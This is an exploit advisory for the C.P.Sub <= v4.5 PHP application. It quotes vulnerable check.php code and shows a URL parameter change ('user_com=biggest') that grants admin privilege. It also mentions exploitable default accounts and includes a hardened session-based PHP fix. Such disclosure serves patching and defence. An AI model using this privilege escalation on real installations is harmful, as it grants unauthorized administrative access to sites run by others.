#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication
# Date: 2013/6/27
# Exploit Author: Chako
# Vendor Homepage: http://www.cooltey.org/ping/php.php
# Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip
# Version: <= v4.5
# Tested on: Windows 7
#
#
####################################################################

Improper Authentication:
==========================================

Description:
C.P.Sub <= v4.5 uses the "user_com=" parameter to identify whether the user has admin privilege.
Therefore, an attacker could simply change the value of the "user_com=" parameter to gain admin privilege.


/check.php (LINE: 36-44)
--------------------------------------------------------------
if($_GET[user_com] != "")
{
    $user_com = $_GET[user_com];
}elseif($_POST[user_com] != "")
{
    $user_com = $_POST[user_com];
}
if($user_com == "biggest")
{
--------------------------------------------------------------


Exploit:
--------------------------------------------------------------

change
http://Example_Target/info.php?cookie=yes&user_com=second

to
http://Example_Target/info.php?cookie=yes&user_com=biggest


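A hardened form of the check.php logic quoted above, as an added example (not C.P.Sub's code and not from the advisory author): the privilege level is read from server-side session state set at login, never from the request. The session key "cp_level" and the helper function names are assumptions; "biggest" and "second" are the values shown in this advisory.

```php
<?php
// Added example: hypothetical hardened replacement for the check.php logic.
// Assumption: the login handler verifies credentials and then calls
// grant_level(); 'cp_level' and all function names here are illustrative.
declare(strict_types=1);

const LEVEL_ADMIN = 'biggest';  // admin value compared in check.php
const LEVEL_USER  = 'second';   // non-admin value seen in the advisory URL

function start_secure_session(): void
{
    if (session_status() === PHP_SESSION_NONE) {
        session_set_cookie_params([
            'httponly' => true,
            'samesite' => 'Strict',
            'secure'   => !empty($_SERVER['HTTPS']),
        ]);
        session_start();
    }
}

// Called once by the login handler, after the password has been verified.
function grant_level(string $level): void
{
    session_regenerate_id(true);  // new session id on privilege change
    $_SESSION['cp_level'] = $level;
}

// The level comes only from server-side state.
// $_GET['user_com'] and $_POST['user_com'] are never consulted.
function current_level(): string
{
    $level = $_SESSION['cp_level'] ?? '';
    return in_array($level, [LEVEL_ADMIN, LEVEL_USER], true) ? $level : '';
}

function require_admin(): void
{
    if (current_level() !== LEVEL_ADMIN) {
        http_response_code(403);
        exit('Forbidden');
    }
}

start_secure_session();
require_admin();  // replaces: if($user_com == "biggest")
// ... admin-only page logic continues here ...
```
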
Misconfiguration
==========================================
There are some default accounts for C.P.Sub <= v4.5 that allow an attacker
to access the back-end management page. This could lead to further attacks.